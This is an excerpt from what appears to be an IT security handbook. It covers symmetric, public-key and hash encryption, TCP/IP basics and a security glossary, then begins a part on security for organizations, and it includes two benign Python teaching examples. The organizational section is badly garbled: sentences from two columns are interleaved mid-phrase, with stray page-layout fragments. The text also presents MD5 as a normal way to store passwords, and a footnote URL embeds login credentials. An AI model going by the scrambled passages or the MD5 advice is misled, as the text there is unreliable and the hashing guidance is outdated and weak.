The number of shifts is called the encryption key. This same number is used to encrypt the message, and later decrypt it. Julius Caesar used this encryption method to keep messages he sent secret (he used a key of 3).

With this simple algorithm, if the message is intercepted and the interceptor understood the concept of encryption, he or she might be able to guess the contents by trying various shifts. If the algorithm was more complex than simply shifting each letter by the same amount, it would be more difficult to decipher. Until recently, many encryption algorithms were just such shifting algorithms.

Today, instead of shifting letters, we use mathematical formulas to encrypt messages. We still use a key and this key is part of the formula to perform the encryption. If you want to decrypt the message, you need the key. If you don't have the key, you could, of course, try various keys until the message made sense. If the key was restricted to the numbers from 1 to 10, this guessing would not take very long. If it were allowed values from 1 to 100, it would probably take longer. Today, keys typically are 128-bit binary numbers. That is equivalent to about 340,000,000,000,000,000,000,000,000,000,000,000,000 possible choices and guessing is not practical.

Symmetrical encryption is used when it makes sense for both the sender and recipient to use the same key (that is, they need to agree to it ahead of time). It is used for encrypting messages while they are being transmitted, over a wireless link, for example, and for encrypting information on disk so that others cannot read it. In the latter case, if you lose the key, the data is essentially lost!
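The digit encoding from The Encoding Process and the one-character shift from Symmetric Encryption, worked through in Python as an added example that is not code from the Handbook. It also runs every one of the 26 possible shifts against the enciphered sample, which is the key-guessing the text describes and the reason such a small key space gives little protection; nothing beyond the page's two substitution tables is assumed.

```python
"""Digit encoding and alphabet-shift encryption from Addendum 1 (added example)."""
import string

ALPHABET = string.ascii_uppercase

# The Encoding Process: A..Z -> 01..26, space -> 27, period -> 28.
DIGIT_CODES = {ch: f"{i:02d}" for i, ch in enumerate(ALPHABET, start=1)}
DIGIT_CODES[" "] = "27"
DIGIT_CODES["."] = "28"
DIGIT_DECODE = {code: ch for ch, code in DIGIT_CODES.items()}


def digit_encode(message):
    """Replace every character by its two-digit code (KeyError for characters the table lacks)."""
    return "".join(DIGIT_CODES[ch] for ch in message.upper())


def digit_decode(digits):
    """Reverse translation: read the string two digits at a time."""
    if len(digits) % 2:
        raise ValueError("encoded text must have an even number of digits")
    pairs = (digits[i:i + 2] for i in range(0, len(digits), 2))
    return "".join(DIGIT_DECODE[p] for p in pairs)


def shift_encrypt(message, key):
    """Shift each letter 'key' places forward, wrapping Z back to A; other characters pass through."""
    out = []
    for ch in message.upper():
        if ch in ALPHABET:
            out.append(ALPHABET[(ALPHABET.index(ch) + key) % 26])
        else:
            out.append(ch)
    return "".join(out)


def shift_decrypt(ciphertext, key):
    """Decryption is the same operation with the opposite shift: one key serves both ways."""
    return shift_encrypt(ciphertext, -key)


def try_all_shifts(ciphertext):
    """The interceptor's option the text mentions: with 26 keys, every candidate can be listed.

    Returns {key: candidate plaintext}; a reader picks the one that makes sense.
    """
    return {key: shift_decrypt(ciphertext, key) for key in range(26)}


if __name__ == "__main__":
    encoded = digit_encode("SECURITY IS IMPORTANT.")
    print(encoded, "->", digit_decode(encoded))
    secret = shift_encrypt("SECURITY IS IMPORTANT", 1)
    print(secret, "->", shift_decrypt(secret, 1))
    for key, guess in try_all_shifts(secret).items():
        print(f"key {key:2d}: {guess}")
```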
Public-key Encryption

Public key encryption is similar to symmetrical encryption with one major exception. Instead of one key, there are two. A different key is used to encrypt the message than is used to decrypt it. In a typical use, the first key is made public and anyone can learn it. If you want to send me a private message, you use my public key that I have given to everyone to encrypt it. To decrypt the message, my private key (which is different from my public key) is needed, and I do not share that key with anyone else. If your message is intercepted, no one else can read it.

Note that in this simple case, I cannot be sure who sent me the message, because anyone might have my public key, but you can be reasonably sure that only I can read it.

Public/Private keys can also be used in reverse. In this case you encrypt the message with your private key, and anyone who has your public key can decrypt it.

One-way Hash Encryption

You can think of a one-way hash encryption as a type of public-key encryption for which no one has the private key. So things can be encrypted, but not decrypted. It is different in that the encrypted message is typically relatively short. A common one-way hash encryption algorithm is called MD5. The output of the MD5 algorithm is always 128 bits (16 bytes). If you create a hash code for two different things, the chances are virtually zero that the two hash codes will be the same.

There are two prime uses of such a code:

Authentication: You can take a long document or a program, compute the MD5 code for it, and keep the code in a safe place. Later, you can go back and compute the code again. If the new code is different from the original one, you will know that the document or program has been changed. Even a tiny change in a large document or program will result in a markedly different MD5 code.

Storing passwords: In many systems, when a user sets a password, it is encrypted using MD5 (or a similar algorithm) and that encrypted version is stored. When the user later attempts to sign on, what they enter is again encrypted, and compared to the one on disk. If they match, you know the password was correct. Note that it is not possible to decrypt the password if the user forgets it; a new one must be set. This method is used because it never allows your password to be seen in its original form. Unfortunately, there is still one problem and this is the reason why one should not use passwords that are short, simple, or guessable words: if you obtain a list of encrypted passwords (from a system that you broke into), it is easy to encrypt all sorts of "easy" passwords to see if the encrypted versions match those in the password table.

Digital Signatures

If I want to send you a message, and ensure that you know that I was the one who sent it, I can use a combination of the encryption techniques:
· I compose the message, and I use MD5 to create a hash code for the message.
· I encrypt the hash code using my private key.
· I send you the message, and the encrypted hash code.
· You receive the message.
· You decrypt the hash code using my public key, which will result in the original hash code.
· You take the text of the message that I sent, and calculate an MD5 hash code from that.
· If the two hash codes are identical, then you can be sure that the message has not been changed since I sent it (otherwise it would result in a different hash code) and that I was the one who sent it (otherwise my public key would not have allowed you to decrypt the original hash code).

The Digital Certificates used by web browsers for secure authentication rely on digital signature techniques such as this one.
ADDENDUM 2. TCP/IP

TCP/IP (Internet Protocol) is the protocol (set of rules) governing all messages sent over the Internet. Although a typical user does not need to know anything about TCP/IP to use the Internet, one does need an overview to configure firewalls and to understand some of the other threats on the Internet. What follows is a very simplistic description of TCP/IP. If you are already familiar with the TCP/IP protocol, you probably do not need to read this chapter.

Internet Addressing

Every device on the Internet has an IP address. In general, this address uniquely defines that device, just as your mailing address on an envelope uniquely defines your home. Addresses in the current version of TCP/IP (known as IPv4) are 32-bit binary numbers, so there are 2^32 = 4,294,967,296 possible addresses. To make it easier to represent and remember, the 32-bit binary number is broken up into 4 8-bit sections. Because 2^8 = 256, each 8-bit section can have a value from 0 to 255. These 4 numbers are normally shown one after each other, connected by periods. So the lowest Internet address is 0.0.0.0 and the highest one is 255.255.255.255. A typical IP address might be 24.200.195.15. Devices called routers on the Internet keep track of where each IP address is and how to get to it.

Domain Name Service

Because long strings of numbers are not easy to remember, many computers on the Internet are given alphabetic names (called a hostname). An example of such a name is www.infodev.org. When you enter this name into your web browser, for example, your computer sends a message to a special service called the Domain Name Service or DNS. The DNS knows how to translate alphabetic names into numeric ones - 192.86.99.121 in this case. DNS also allows a web server to be moved to a different location on the Internet. The owner informs the DNS of the new address, but users can still use the original hostname.

IP: Internet Protocol

When data is sent over the Internet, it is sent in blocks of characters called a packet or datagram. The IP in TCP/IP stands for Internet Protocol, and the Internet Protocol defines how the packet looks inside. The IP packet contains a number of pieces of information. Among them are:
· the size of the packet;
· the IP address of the sender;
· the IP address where the packet is being sent;
· the type of packet.

When a packet leaves your computer, it is sent to the nearest router which attempts to send it to the next router along the way to its destination. If, due to congestion or some other problem, the packet cannot get delivered, it is simply ignored. For this reason, IP is called an unreliable protocol. Although in theory IP is unreliable, in most cases, the Internet delivers all the packets that are sent.

There are a number of different types of packets that can be sent, but there are only two that we will look at here. They are TCP and UDP.

TCP: Transmission Control Protocol

TCP is the protocol that is used for most messages, including the web (HTTP), File Transfer Protocol (FTP) and e-mail. In addition to the data being sent, the TCP packet includes:
· a 16-bit sending port number;
· a 16-bit receiving port number;
· sequencing information;
· acknowledgement information.

Because a single computer typically has just one IP address, the port number is used to indicate what program within the computer is sending or receiving the message. This is what allows you to have several web browser windows open on your computer and to have the pages that you request go back to the correct window. For a program to receive a TCP message, it must be listening on the correct port. Typically, a specific port is used for each type of application. For instance, a web server usually listens on port 80. When you open a browser window, it typically picks a semi-random port number (by convention higher than 1023) as its port, and this is the port that it listens on. Because IP packets are limited in length, and the data transmitted by an application program may be much larger, the data can be chopped up into smaller segments. Each segment is sent in its own TCP packet.
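The IP, TCP and UDP header fields this addendum lists (packet size, sender and receiver addresses, packet type, the two 16-bit ports, and TCP's sequence and acknowledgement numbers), read out of constructed packets in Python as an added example that is not the Handbook's code; the UDP header is the one described in the next section. The packets are built inside the example from the two addresses quoted in the addendum, a browser on a high port talking to a web server on port 80 and a DNS query to port 53; the layouts are the standard IPv4, TCP and UDP header formats and the checksums are left at zero because nothing here is transmitted.

```python
"""Decode the packet fields described in Addendum 2 from constructed IPv4/TCP/UDP packets."""
import ipaddress
import struct

PROTOCOL_NAMES = {6: "TCP", 17: "UDP"}  # values of the "type of packet" field for TCP and UDP


def dotted(addr: int) -> str:
    """Show a 32-bit address as four 8-bit sections, 0-255 each, joined by periods."""
    return str(ipaddress.IPv4Address(addr))


def parse_ipv4(packet: bytes) -> dict:
    """Decode the fixed 20-byte IPv4 header and return its fields plus the payload."""
    if len(packet) < 20:
        raise ValueError("too short for an IPv4 header")
    version_ihl, _tos, total_length, _ident, _flags, _ttl, proto, _csum, src, dst = \
        struct.unpack("!BBHHHBBHII", packet[:20])
    if version_ihl >> 4 != 4:
        raise ValueError("not an IPv4 packet")
    header_len = (version_ihl & 0x0F) * 4  # header length is counted in 32-bit words
    return {
        "size": total_length,
        "sender": dotted(src),
        "receiver": dotted(dst),
        "type": PROTOCOL_NAMES.get(proto, str(proto)),
        "payload": packet[header_len:total_length],
    }


def parse_tcp(segment: bytes) -> dict:
    """The four items the text lists for TCP: both ports, sequencing and acknowledgement info."""
    src_port, dst_port, seq, ack, offset_flags = struct.unpack("!HHIIH", segment[:14])
    data_offset = (offset_flags >> 12) * 4
    return {"sending_port": src_port, "receiving_port": dst_port,
            "sequence": seq, "acknowledgement": ack, "data": segment[data_offset:]}


def parse_udp(datagram: bytes) -> dict:
    """UDP carries only the two ports (plus a length and checksum): no sequencing, no acknowledgement."""
    src_port, dst_port, length, _csum = struct.unpack("!HHHH", datagram[:8])
    return {"sending_port": src_port, "receiving_port": dst_port, "data": datagram[8:length]}


def build_ipv4(src: str, dst: str, proto: int, payload: bytes) -> bytes:
    """Construct a minimal IPv4 packet (checksum left zero) for the demonstration."""
    total = 20 + len(payload)
    header = struct.pack("!BBHHHBBHII", 0x45, 0, total, 0, 0, 64, proto, 0,
                         int(ipaddress.IPv4Address(src)), int(ipaddress.IPv4Address(dst)))
    return header + payload


def build_tcp(src_port: int, dst_port: int, seq: int, ack: int, data: bytes) -> bytes:
    # 20-byte header: data offset 5 words, ACK flag set, window 65535, checksum and urgent pointer 0
    return struct.pack("!HHIIHHHH", src_port, dst_port, seq, ack, (5 << 12) | 0x10, 65535, 0, 0) + data


def build_udp(src_port: int, dst_port: int, data: bytes) -> bytes:
    return struct.pack("!HHHH", src_port, dst_port, 8 + len(data), 0) + data


def describe(packet: bytes) -> dict:
    """Parse an IPv4 packet and then its TCP or UDP payload, as a packet filter would."""
    ip = parse_ipv4(packet)
    inner = parse_tcp(ip["payload"]) if ip["type"] == "TCP" else parse_udp(ip["payload"])
    return {**{k: v for k, v in ip.items() if k != "payload"}, **inner}


# Constructed sample packets; the addresses are the two quoted in this addendum.
WEB_REQUEST = build_ipv4("24.200.195.15", "192.86.99.121", 6,
                         build_tcp(49152, 80, 1000, 5000, b"GET / HTTP/1.0\r\n\r\n"))
DNS_QUERY = build_ipv4("24.200.195.15", "192.86.99.121", 17, build_udp(53001, 53, b"\x00" * 12))

if __name__ == "__main__":
    print(describe(WEB_REQUEST))
    print(describe(DNS_QUERY))
```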
For various reasons, some packets may arrive faster than others, which means that they may arrive out of order. The sequencing information allows the receiving program to re-assemble the segments in the correct order. Since IP is potentially unreliable, it is possible that one of the segments never arrives. In this case, the receiving program will notice that there is a gap in the sequence and it can request that the missing packet be resent.

When a program sends a TCP packet, it expects the receiving program to acknowledge it. If an acknowledgement does not arrive in a reasonable time, the packet can be re-transmitted. Because of the sequence numbers and the acknowledgements, TCP is a reliable protocol. When it is used, the user application can be sure that if there is an error in transmission or reception, the application will be informed.

UDP: User Datagram Protocol

UDP is a simple format to allow data to be transmitted. Each UDP packet includes some information in addition to the data. These include:
· a 16-bit sending port number, and
· a 16-bit receiving port number.

Just as with TCP, because port numbers are used, there can be several programs sending or receiving UDP streams in parallel. Also like TCP, to receive a message, the program must be listening on the correct port. There are no provisions for sequencing or acknowledgement in UDP, so it (like IP) is an unreliable protocol. In theory, messages can be lost. It is used in cases where it either does not matter if an occasional message is lost, or if there is a simple way to recover from the lost message. Because there are no acknowledgements or sequencing, it uses far fewer resources.

ADDENDUM 3. MINI-GLOSSARY OF TECHNICAL TERMS

Definitions Related to Security

Attachment: An attachment is a method by which text and images can be sent via e-mail. Any non-text file (which could be a program or a picture or a video) is converted ("encoded") into a printable form and inserted into the text message. Specifically, anything stored in your computer is composed of zeros and ones. Encoding, in its simplest form, would send the zeros and ones as printable characters.

Backdoor: A way to bypass the normal login security and gain control of a computer without obtaining the owner's consent. If a backdoor is installed on a network-attached computer, a person anywhere on the Internet may be able to gain control of your computer without your knowledge or approval.

Backup: The process of copying computer files to some other location either on the computer, or on storage devices that may be separated from the computer. Backups allow you to recover data in the event that the originals are no longer available (for reasons ranging from accidental deletion to physical damage, theft or other loss).

Buffer Overflow: A software bug that occurs when a program moves data into a space in memory, but there is not enough room. The program may discard characters to try to make space for the new data.[34] Destroying these characters can cause all sorts of problems, and often can allow things to happen which affect the integrity or security of the program. Buffer overflows can be avoided (if you are programming) by checking that there is sufficient space in memory before doing a move.

Cookie: A file that is written to or read from your hard disk at the request of a remote web site. The web site requests that the file be written and reads it later. As a simple example, if you tell a web site what your username is, it can request that this information be written to your disk. When you go back to that web site, it reads the cookie and knows what your username is.

Daemon: A small program that runs all of the time waiting for someone to ask it to do something; often such requests may be made remotely over the network.

Denial-of-Service: A Denial-of-Service attack is when computers on the Internet are bombarded with (garbage) messages to such a great extent that they spend all of their time responding to these messages. Real user traffic can no longer get through.

E-mail: The computer-based equivalent of postal mail, e(lectronic)-mail. Properly addressed e-mail can be sent and received by anyone connected to the Internet. From the perspective of the Internet, all e-mail is composed of printable text (ASCII) messages.

Encryption: Encryption is a way to disguise information so that it cannot be read easily, except by the intended recipient. In the simplest case, there is a "key" in conjunction with a set of rules that is used to disguise that information. It can only be read after being decrypted, and to decrypt it, you would need to know the "key" and the appropriate rules.

[34] For example, the program might move 100 characters into an area that is only 80 characters long. Assume that the programmer is moving the data into an area starting at location 1001 in memory. The first 80 characters go just where they should, into locations 1001-1080, but the last 20 characters go into locations 1081-1100; they overlap on top of whatever was there before (since the maximum move was supposed to be just 80 characters).

Firewall: Firewalls can block transmissions between you and the outside world that are unexpected or disallowed. Firewalls have two forms: a firewall may be a software program running on your computer or it may be a separate piece of hardware that watches what is being sent and received over a network.

HTML: HTML is short for HyperText Markup Language. A mark-up language allows commands or instructions embedded in the text to be displayed and printed. It is essentially a set of instructions that tells a web browser or mail program how to display text and images. It can also give other instructions to the browser/mail program. An example of a mark-up language is: This sentence is <>very<> short. When the sentence is displayed, the words within the << >> are taken as instructions on what to do. As a result, the sentence would be displayed as: This sentence is very short.

Identity theft: Identity theft occurs when someone gathers enough information about you to convince others (such as banks, stores or governments) that they are you.

Keyboard logger: A program that captures everything that is typed on a keyboard. The data can be written to disk or sent to someone else via the Internet.

Open Source: Programs that are distributed in source format under conditions that allow free modification and distribution. Since the source code is available, people can see how it works and are able to change it. The authors of Open Source programs often encourage other programmers to participate in the further development of the programs. Open Source also includes software that is given away for free, and many Open Source programs, both free and for sale, offer functionality that is similar to proprietary programs that may cost a substantial amount of money. Sometimes Open Source programs are incorporated into fee-based programs in special licensing arrangements. See www.opensource.org and www.fsf.org for additional information.

Spam: Advertising or other e-mail sent to you without your requesting it.

URL: Universal Resource Locator, a generalized address to locate something in the Internet. Examples are http://www.infodev.org/ and mailto:security-handbook@worldbank.org

Username/password: A name and a secret password that identifies a user to a computer system or a web site.

Virus: The term "virus" has a very specific meaning that will be defined and
discussed in more detail later. For the present, it will be used to describe a family of programs (including viruses, worms and Trojans) that can unexpectedly show up in your computer, may spread to other computers, and can do significant harm. This harm includes, but is not limited to, destroying files and data.

If a keyboard logger is installed on a computer, everything that is entered on the computer, including usernames and passwords, can be captured, just as if someone was looking over your shoulder while you typed!

PART THREE
SECURITY FOR ORGANIZATIONS

CHAPTER 1. INTRODUCTION
CHAPTER 2. OVERVIEW OF E-SECURITY RISK MITIGATION
CHAPTER 3. RISK EVALUATION AND LOSS ANALYSIS
CHAPTER 4. PLANNING YOUR SECURITY NEEDS
CHAPTER 5. ORGANIZATIONAL SECURITY POLICY AND PREVENTION
CHAPTER 6. PERSONNEL SECURITY
CHAPTER 7. SECURITY OUTSOURCING
CHAPTER 8. PRIVACY POLICIES, LEGISLATION, AND GOVERNMENT REGULATION
CHAPTER 9. COMPUTER CRIME
CHAPTER 10. MOBILE RISK MANAGEMENT
CHAPTER 11. BEST PRACTICES: BUILDING A SECURITY CULTURE
CHAPTER 12. GENERAL RULES FOR COMPUTER USERS
CHAPTER 13. GLOBAL DIALOGUES ON SECURITY

CHAPTER 1. INTRODUCTION

As we have seen in Part 2, much can be done by individual users to secure their computers and the data stored on them. In small organizations, provisions for IT security may also be quite simple, with each person holding responsibility for his or her own computer and files. However, for somewhat larger groups, groups that are engaged in commercial transactions, or groups that maintain confidential data for customers or public citizens, the need to establish formal security policies and procedures becomes more important. When managers and their staff consider the issue of IT security, whether they are operating businesses, non-profit organizations, or government agencies, they will all have similar concerns. Each group will want a certain level of security for their data, procedures that are clear and easy for employees to follow, the ability to retain and build on knowledge of customer needs, and an understanding of how their security policy is faring in a given operational environment. In addition to these general needs, each type of organization has special concerns related to its mission and goals. Managers must emphasize information security policies in the appropriate context in order to pursue stated objectives effectively. It is also important to understand the costs involved with implementing good security practices. Security procedures and technologies are an investment and should be evaluated against the costs of potential losses; the practical recommendations in Part 3 are provided with an understanding of the rigorous cost-benefit analysis that is necessary in a resource-constrained environment.

Some Statistics on IT Security in Organizations

Ernst & Young's Global Information Security Survey 2003[35] reveals that 90% of organizations say information security is of high importance for achieving their overall objectives. 78% of organizations identify risk reduction as their top influencer for information security spending. These organizations are typically Fortune 1000 companies with substantial financial and personnel resources available to tackle challenging security-related issues. Even so,
- More than 34% of organizations rate themselves as less than adequate in their ability to determine whether their systems are currently under attack.
- More than 33% of organizations say they are inadequate in their ability to respond to incidents.
- Only 34% of organizations claim to be compliant with applicable security-driven regulations.
- 56% of organizations cite insufficient budget as the number one obstacle to an effective information security posture.
- Nearly 60% of organizations say they rarely or never calculate return on investment for information security spending.
- Only 29% of organizations list employee awareness and training as a top area of information security spending, compared with 83% of organizations that list technology as their top information security spending area.
- Only 35% of organizations say they have continuous education and awareness programs.

These statistics illustrate the fact that all organizations, no matter how large and seemingly well-off, feel the pressures, both psychological and financial, that come from threats to IT security. The chapters to follow will focus on the priorities and concerns of small to medium sized organizations. However, it may be useful to keep the Ernst and Young survey in mind as a symbol of the challenges faced in a range of business environments.

[35] http://www.ey.com/global/download.nsf/International/TSRS_-_Global_Information_Security_Survey_2003/$file/TSRS_-_Global_Information_Security_Survey_2003.pdf

[36] The definition of a small to medium sized enterprise will vary from country to country. In some cases, a single owner will run every aspect of a traditional business such as a farm stand or a grocery store; the owner may be the business's sole employee. In other cases, a few hundred people may be involved in a more complex enterprise focusing on consumer or technology products. In the developed world, technology based startups are considered SMEs, but they may receive substantial funding from investment groups, grow rapidly, and ultimately be acquired by large corporations. Some highly successful SMEs issue stock and become large, publicly owned corporations themselves.

Information Technology Security Handbook SECURITY FOR ORGANIZATIONS 83

Small and Medium-Sized Businesses[36]

If you are running a small or medium sized business, your top priorities are profitability, business continuity, sustainability, and customer service. SMEs are also bound by local, regional, or national laws and may be accountable to a range of authorities, depending on the business that they are engaged in and the country's overall business environment. Security will be focused on protecting the enterprise and its customers from fraud and costly malicious attacks on their systems and services. In addition to computer crime and network security, data protection is also important to SMEs and encompasses two main areas: enterprise data protection from corporate spies or attackers, and customer data protection, including credit card and transaction information.[37]

Government Agencies

In government agencies, IT deployments may be assessed in terms of efficiency, ease-of-use, and ability to link up with other departments and agencies as needed. While profitability is generally not relevant in the governmental context, like non-profits, there are often budget controls that limit the agency's ability to acquire the latest in hardware and software security. At the same time, governments must be keenly focused on data protection in targeted environments, as their databases contain sensitive information on individuals, including personal identification, health, criminal, and tax records.

Unfortunately, even in industrialized countries, data protection in government agencies lags behind and suffers from antiquated systems, inadequate funding, and overworked staff who lack core competencies in IT security.

Non-profit Organizations

In non-profit organizations, your managers and employees are focused on effectiveness in the field, coordination with communities and partners, and reputation. Systems may be widely dispersed and are often of lesser quality due to the budget constraints present in the non-profit world. In addition, the staff may be less experienced with technology and thus
will be facing a substantial challenge as they seek to Like businesses and non-profits, the government must be P provide uninterrupted service to their constituencies concerned with its public image after hacking incidents or ART and maintain a positive image to their donors, other security breaches are brought to light in the media. overseers, and peers. SMEs - Engines of Growth Universities THREE In a recent report on IT in developing countries, As with non-profits, budget constraints, disbursed the UNDP outlined some of the promises and challenges networks, and a wide range of technological skill are facing individuals and organizations in the information present in university systems. Universities may face age.38 The World Bank has been producing a series a greater number of internal threats as students may of reports on specific topics in information technology find hacking the institutional system an engaging development and deployment.39 Although the enterprise pastime. In addition, universities may be operating technology experiences in the industrialized world under a unique set of internal policies and also need are different in some ways (scale, costs, knowledge to comply with government regulations. In the university base of the personnel), there are some lessons to be environment, personal data protection is extremely drawn from their strengths and weaknesses in the important, as student files include much sensitive infor- area of IT security. Large enterprises are fewer, mation including identification numbers, health records, have specialized capabilities, and deeper pockets. and academic transcripts. Potential attackers could However, there are still tensions between Chief steal, modify, or destroy such data, causing serious Security Officers as managers of cost centers, damage to the credibility and effectiveness of the Chief Financial Officers as cost controllers, university system. 
and other branches of the organization 37In general, corporate spies are a concern in larger enterprises, or enterprises that are producing high tech products, where the intellectual property (patents) may have value if stolen. For enterprises engaged in commerce, eavesdroppers may be of greater concern than spies, though the actions they take are similar. In particular, a company should protect its accounting records, personnel information, and credit card transaction data safe from unauthorized access. 38See The Human Development Report 2001: Making New Technologies Work for Human Development" (UNDP: NY, 2001). 39See references at the World Bank site: www.worldbank.org and also research projects and products available at the IT Governance Institute (ITGI): www.itgi.org. 84 INFORMATION SECURITY AND GOVERNMENT POLICIES (Chief Information Officers, Sales and Marketing, security risks for that customer's data and equipment production).40 Without an overarching mandate to and by providing digital content and a means of create a secure IT environment, each group could communication, the ISP is subject to state and federal develop an approach to security that is driven by its regulation. If one adds the capacity for e-commerce, own mission, goals, and operational targets. While these the potential gains and attendant liabilities are varied approaches might lead to some areas being substantial over-secured and other being under-secured, clear communication from top-level management will emphasize The Risks of Blended Threats 41 that sound security practices are aligned with the well being of the organization. The technology policies and Survey data from a range of respected sources illustrates implementations required to operate a safe and secure an increase in the use of malicious code for egregious system for the enterprise are a necessary part of meeting criminal purposes. Multiple reports generated in 2002 core business objectives effectively. 
pertained to such things as: identity theft related to malicious code, web site defacements stemming from Small and medium sized enterprises have fewer resources political motives, distributed denial of service attacks to deploy, a flatter management hierarchy, and heavier against specific organizational targets, and so on. reliance on the knowledge base of all employees. In Furthermore, the proliferation of blended threats poses SMEs, the business processes may be more transparent serious risks for everyone on the Internet. These risks than those in a larger organization and there are special are not confined to a particular area, but threaten the security risks inherent in a structure where so much cor- entire global network. For example, the Klez worm family porate information is out in the open, for all employees appears to have originated in Asia, with authorship to see. In businesses that are not focused on technology, attributions suspected in either China or Hong Kong. there may be vulnerabilities to an employee or consult- Asian countries are currently acquiring and making ant who is more technologically savvy than the company use of Internet connected computers at a rapid pace. managers. In a technology-focused company, there is Unfortunately, many of these computers are unprotected the danger that critical intellectual property may be and their users do not understand basic safe computing insufficiently protected from theft or destruction. practices. As a result, it is likely that areas of high tech- nological growth, like China, will be exploited by attackers As a safeguard against such problems, all SMEs should to spread viruses, worms, Trojans, and blends of all three conduct a complete review of their mission, goals, around the world. competencies, and information systems. 
If they are work- ing in areas that may create security risks for others, Current software tools offer a range of protection against developing emerging technologies, for example, they malicious code, but they are unable to offer full defense should examine the likely threats to their customers' against all forms of attack. Embracing a multi-layered security and develop mitigation plans. If they are work- defense model, from both a technical and human ing in areas that will face government scrutiny, offering perspective, merely lowers the risk of a malicious code products and services in telecommunications, for exam- incident--it does not eliminate it. "Blended Threats" like ple, then they should understand when and how they Code Red, Slammer, Klez, and Bugbear can permanently may be legally responsible for adhering to government compromise networks. Many worms do not carry destructive mandates. An Internet Service Provider is an example payloads themselves; instead, they install trap doors in of a business that runs both types of risk. By hooking computer systems, thus allowing easy and frequent network customers up to the Internet, they are creating potential access for anyone familiar with the trap-door locations. 40 In larger technology companies, or startups planning to grow rapidly, the management team is composed of individuals with specialized areas of business or technical expertise. These roles include, but are not limited to: Chief Executive Officer (CEO), Chief Financial Officer (CFO), Chief Technology Officer (CTO), Chief Information Officer (CIO) and, increasingly Chief Security Officer (CSO). There are also a range of Vice President positions in a typi- cal corporation, including VPs of Marketing, Sales, and Business Development. 
While such formal structure may not be necessary (or possible) in a smaller enterprise, it is useful to see how responsibilities are divided up in large firms and to note the growing importance of the CSO 41See the 2003 World Bank paper "Blended Electronic Security Threats: Code Red, Klez, Slammer and BugBear" by Tom Kellermann and Yumi Nishiyama listed at: http://wbln0018.worldbank.org/html/FinancialSectorWeb.nsf/SearchGeneral?openform&E-Security/E-Finance&Publications . Information Technology Security Handbook SECURITY FOR ORGANIZATIONS 85 Moreover, worms are, in some ways, more effective at IT security issues facing enterprises, large and small, disabling systems than viruses are, due to their ability in the developed and developing world. The sections are to exploit vulnerabilities in common applications, such as designed with a specific focus on actions to be taken by web browsers. executives, managers, and employees in order to protect their systems, their customers, their suppliers, and other Given this computing environment, users should educate stakeholders in the enterprise. The checklists and procedur- themselves about the risks and take actions appropriate al notes can easily be adapted for use in a non-profit to their individual situations. When safe computing or government agency context. is exercised, the risk of an attack can be dramatically lowered, though it cannot be eliminated. Since the threat In addition to internal policies and procedures, some SMEs of deliberate computer sabotage is significant for organiza- may choose to outsource their security needs. In the tions, it is important to examine the risks posed to industrialized world, some experts say that outsourcing for individual security and to include the risks associated non-core services like IT security has been the corporate with financial transactions and the new challenges strategy of the decade. In addition, some organizations posed by mobile computing platforms. 
have a specific interest in global security needs, particularly those of developing countries. As an example, ISACA, the Advantages of IT and IT Management Information System Audit and Control Association has part- nerships in 60 countries and provides cases from various In spite of the challenges, entrepreneurs and managers countries, and programs, all available as open source.42 in the public and private sectors in developing countries ISACA also offers an audit and control framework for organ- P are investing in new information and communication izations and includes checklists for outsourcing situations. ART technologies, including e-mail, the Internet, wireless telephony, and business software to assist in running Whether conducted and controlled in-house or through their day-to-day operations. The advantages in efficiency, outside vendors, developing and maintaining strong security THREE outreach, and cost savings in these new devices and infrastructure, policies, and procedures is a balancing services are clear: act for most enterprises. Executives, managers, and policy makers must weigh the risks and set a standard that 1. They improve business communications with balances the investment in security with the official customers, suppliers, and partners; objectives and bottom line growth of the company. 2. They enhance the ability to access large quantities Once a company has achieved the desired level of security, of information quickly and cheaply; and the management must not forget the importance of main- 3. They provide a means to expand data protection taining up-to-date systems and performing regular audits and management capabilities, resulting in better of the security plan. 
Changes in computer and networking record keeping for financial managers, better equipment, from proprietary to Open Source software customer analysis for sales and marketing packages, for example, will require a complete review of managers, and better production statistics for the security blueprint. In short, security is an art form, line managers. rather than a science, and requires the coordination of many creative thinkers to ensure its successful impact However, as we have seen, these improvements are not on an organization and society as a whole.43 without risk, both the physical assets and to less tangible information assets. Part 3 of this Handbook will explore the 42For further information on the cases and programs, see the Information Systems Audit and Control Association at: www.isaca.org. One such study fea- tured the country of Uruguay that might be of particular interest to readers of this handbook: http://www.isaca.org/ct_case.htm. COBIT (http://www.isaca.org/cobit.htm) provides a reference framework on e-Security for management, users, and IS audit, control, and security practi- tioners. The latest communication from ISACA will give you a good overview of current and future developments of the Association: Volume 8 2003 of Global Communiqué: http://ISACF:RESEARCH4@www.isaca.org/@member/gcomm/gcv034.pdf 43Due to the rise in security incidents globally, a number of consulting firms have been producing reports on IT in an international context. See, for example, Ernst & Young's 2003 Global Information Security Survey: http://www.ey.com/global/download.nsf/US/TSRS_Global_Information_Security_Survey_2003/$file/TSRS_- _Global_Information_Security_Survey_2003.pdf 86 INFORMATION SECURITY AND GOVERNMENT POLICIES CHAPTER 2. possible approaches for bridging those gaps. It also OVERVIEW OF E-SECURITY RISK acknowledges some of the efforts underway around the world aimed at resolving these issues. MITIGATION 44 At a Glance What is electronic security? 
Broadly speaking, electronic security is any tool, This chapter of the Handbook identifies, defines, technique, or process used to protect a system's and discusses, under eight pillars, policies, processes, information assets. Electronic security enhances the and an overall infrastructure that can foster a secure value of a network and is composed of soft and hard electronic environment for the financial services sector. infrastructure. The soft infrastructure components are It is intended for policymakers working with financial the policies, processes, protocols, and guidelines that services providers, especially executives, chief informa- protect the system and the data from compromise. The tion, and security officers. The technical sections should hard infrastructure consists of hardware and software be of special use to those who administer electronic needed to protect the system and data from threats to security systems, bank examiners who evaluate the ade- security from inside or outside the organization. The quacy of electronic security, and those who deal with degree of electronic security used for any activity the associated day-to-day risks inherent in electronic should be proportional to the activity's underlying transactions. value. Appropriate security measures will mitigate Security in e-Finance (but not eliminate) the risk for the underlying transaction, in proportion to its value. A recent series of papers on e-finance identified elec- Electronic security will require more attention tronic security as crucial to enabling electronic finance as new technology creates new risks and as to meet business and consumer expectations and deliver technologies converge. 
